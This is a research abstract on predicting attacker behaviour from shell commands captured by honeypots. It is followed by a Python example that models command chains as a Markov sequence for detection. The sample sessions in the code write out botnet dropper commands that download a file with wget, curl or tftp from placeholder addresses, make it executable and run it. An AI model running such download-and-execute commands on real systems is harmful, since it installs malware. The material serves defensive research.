Analysis of Attacker Behavior in Compromised Hosts During Command and Control

by Farhan Sadique et al.

The traditional reactive approach of blacklisting botnets fails to keep pace with the rapidly evolving landscape of cyberattacks. An automated, proactive approach to detecting and blocking botnet hosts would greatly benefit the industry. Behavioral analysis of botnets has been shown to be effective against a wide variety of attack types. Current works, however, focus solely on analyzing network traffic to and from the bots. In this work we take a different approach: we analyze the chain of commands an attacker enters on a compromised host. We deployed several honeypots that simulate Linux shells and allowed attackers access to them in order to collect a large dataset of shell commands. We further developed an automated mechanism to analyze these data, built on a system we developed called CYbersecurity information Exchange with Privacy (CYBEX-P). Finally, we performed a sequential analysis of the dataset to show that attacker behavior can be predicted from the shell commands alone, without the network-traffic analysis that previous works rely on.
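To make the idea of sequential analysis over honeypot command chains concrete, the following added example (not code from the paper or from CYBEX-P) reduces each captured session to the ordered list of program names it invokes, counts consecutive-command transitions as a first-order Markov chain, predicts the most likely next command, and flags transitions in a new session that were never observed. The sessions, hostnames and addresses are constructed for illustration, and the Markov model is one simple form of sequential analysis, not necessarily the method the paper applies.

```python
"""Next-command prediction over honeypot shell sessions (added example).

The sessions below are constructed, not the paper's data; the first-order
Markov model is an illustrative choice, not necessarily the paper's method.
"""
import os
import re
import shlex
from collections import Counter, defaultdict

START, END = "<s>", "</s>"

# Constructed sessions: each is the list of raw lines one attacker typed into
# a shell honeypot. Addresses are from the TEST-NET documentation ranges.
SAMPLE_SESSIONS = [
    ["enable", "system", "shell", "sh",
     "cat /proc/mounts; /bin/busybox ABCDE",
     "cd /tmp; wget http://198.51.100.7/bins.sh; chmod 777 bins.sh; sh bins.sh"],
    ["uname -a", "cat /proc/cpuinfo | grep name | wc -l", "ls -la /tmp",
     "cd /tmp; curl -O http://198.51.100.7/x86; chmod +x x86; ./x86"],
    ["enable", "system", "shell", "sh", "cat /proc/mounts",
     "cd /tmp || cd /var/run; wget http://203.0.113.5/a.sh; chmod 777 a.sh; sh a.sh"],
    ["uname -a", "cat /proc/cpuinfo",
     "cd /tmp; wget http://203.0.113.5/arm7; chmod +x arm7; ./arm7"],
]

# Shell control operators that separate simple commands on one typed line.
_OPERATORS = re.compile(r"\s*(?:\|\||&&|[;|&])\s*")


def line_to_commands(line):
    """Reduce one typed line to the program names it invokes, in order.

    'cd /tmp; wget http://x/a.sh; chmod 777 a.sh' -> ['cd', 'wget', 'chmod'].
    Arguments are dropped so sessions that differ only in URLs or file
    names map to the same command chain.
    """
    names = []
    for segment in _OPERATORS.split(line):
        if not segment:
            continue
        try:
            tokens = shlex.split(segment)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            tokens = segment.split()
        if tokens:
            names.append(os.path.basename(tokens[0]))
    return names


def session_to_sequence(lines):
    """Flatten a whole session into one chain of command names."""
    return [name for line in lines for name in line_to_commands(line)]


def train_model(sessions):
    """Count first-order transitions between consecutive commands.

    Returns {current: Counter({next: count})}; START/END sentinels make the
    session boundaries part of the model as well.
    """
    model = defaultdict(Counter)
    for lines in sessions:
        seq = [START] + session_to_sequence(lines) + [END]
        for cur, nxt in zip(seq, seq[1:]):
            model[cur][nxt] += 1
    return model


def transition_prob(model, cur, nxt):
    """Maximum-likelihood P(nxt | cur); 0.0 for never-seen transitions."""
    total = sum(model[cur].values()) if cur in model else 0
    return model[cur][nxt] / total if total else 0.0


def predict_next(model, cur):
    """Most frequent successor of cur, or None if cur was never observed."""
    if cur not in model:
        return None
    return model[cur].most_common(1)[0][0]


def unseen_transitions(model, sequence):
    """Consecutive pairs in a new session that the trained model never saw.

    These are the points where a live session departs from known behaviour
    and deserves analyst attention.
    """
    return [(cur, nxt) for cur, nxt in zip(sequence, sequence[1:])
            if transition_prob(model, cur, nxt) == 0.0]


if __name__ == "__main__":
    model = train_model(SAMPLE_SESSIONS)
    for cmd in ("cd", "wget", "chmod"):
        nxt = predict_next(model, cmd)
        print(f"after {cmd!r} expect {nxt!r} (p={transition_prob(model, cmd, nxt):.2f})")
    live = session_to_sequence(["uname -a", "cd /tmp; tftp -g -r x 203.0.113.9; chmod +x x"])
    print("unseen transitions:", unseen_transitions(model, live))
```

Dropping arguments is the key normalisation step: the download URL and dropper file name change from campaign to campaign, but the chain `cd -> wget -> chmod -> sh` does not, so the transition counts stay informative even on small datasets. Replacing the first-order counts with a longer context window (or a sequence model) is the natural next step once enough sessions are available.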
